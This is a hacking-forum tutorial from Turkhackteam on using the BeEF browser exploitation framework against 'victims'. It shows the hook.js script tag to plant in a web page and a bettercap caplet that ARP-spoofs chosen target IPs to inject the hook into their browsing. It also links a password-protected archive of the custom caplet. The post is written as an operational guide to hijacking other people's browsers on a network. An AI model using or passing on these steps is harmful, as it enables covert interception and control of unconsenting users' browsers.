What is BeEF Framework? How to use? (Exploiting Browsers Tool)

swarq

Katılımcı Üye
1 May 2020
333
184
Beacon Hills
31e868b3fc2f852213e7d8be11d78b4d.jpg



What is BeEF?

In this regard, we will examine a tool called Beef. This tool is called browser exploitation framework, which is a tool for exploiting browsers.


Hackers use this tool to run javascript code in the target computer's browser.

BeEF consists of 3 layers.

1- Personal computers of the Attacker or Attackers
2- The server where BeEF is installed
3- Goals

How to Install BeEF on Kali Linux?

We open the terminal and we are writing this.

Code:
git clone https://github.com/beefproject/beef

aG6JKI.jpg


After the installation is finished, we are writing ls to the terminal and we see the beef.

cJeZWV.jpg


We are typing cd beef and go into the beef folder.

We are writing./install for once on purpose and say "y" to the questions and entering.

WNOJXr.jpg


Now, when we turn the system off and on, it is enough to say "cd beef" "./beef".

wh9OB9.jpg


The error here is asking us to change our username password in beef.

For this, we are writing nano config.yaml in the terminal.

2HnPK5.jpg


After the user and passwd are changed, we do "CTRL-O" "enter" "CTRL-X" and scolding.

For login to Beef, you can enter ./beef by clicking one of the addresses below after typed.

QUdYZy.jpg



Friends, I will show you on apache server so that you can understand BeEF basically.

First of all, I will create a website by using the service called Apache in Linux.

This is for example purposes only, you can think more creatively and hook your victims to the hook.

For this, I come to the console and I am writing service apache2 start.

Then I am editing the index of my site and I am going to the /var/www/index.html directory.

We open the index.html with the help of a leafpad or another application and we are pasting the code <script src = "http://127.0.0.1:3000/hook.js"> </script> into it. You are requiring to write your own IP address instead of 127.0.0.1.

a4np3q.jpg

KFMckp.png


To learn our own IP, we come to the terminal and we are writing ifconfig mine is 10.0.2.10 so I am writing the code like this <script src = "http://10.0.2.10:3000/hook.js"> </script>

8FXVIN.jpg


Yes, our goal taken the bait, the victim has to stay on the site in order to reach our goal for a long time.

MOFHIb.jpg


We will inject a Javascript code into our victim's browser so that we can access it even if it leaves our site.

For this, we will use bettercap, which is available in Kali Linux.

First you are requiring to download the file named beefcustom.zip that I gave you below the topic.

We are throwing the file named beefcustom in the downloaded RAR file to usr / share / bettercap / caplets directory.

Open the file named beefcustom.cap in the Beefcustom file with a leafpad or another application.

iQvarZ.jpg


Instead of the ip where it says set arp.spoof.targets 10.0.2.4, we are writing the ips of our victim.

Then we are opening the file named beefcustom.js in the same way, we are writing our own ip address instead of 10.0.2.8, save and closing.

DRmmCN.jpg



To run Bettercamp, we are writing bettercap -iface eth0 -caplet /usr/share/bettercap/caplets/beefcustom/beefcustom.cap to the terminal.

rYKELx.jpg


Yes, now victim online, let's try our commands in our victim's browser for this, we are clicking on the Commands section shown in the photo below.

VN3sbu.jpg


The green ones mean they will work, the red ones mean they will work less likely.

I am clicking on the Browser section in the Commands section, there is a command called Create Alert Dialog in Hooked Domain, let's try that will send a warning message to our victim.

CJLb63.jpg


Yes, we have a warning message.

MV8zsa.jpg


BEEF CUSTOM DOWNLOAD LINK:https://www.dosyaupload.com/cgZ8

RAR PASS : pytang

VIRUS TOTAL :https://www.virustotal.com/gui/file...23f57240b2e6273c6b5ed04edb1168a8056/detection

Source:https://www.turkhackteam.org/siber-...sil-kullanilir-browserlari-somurme-araci.html





 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.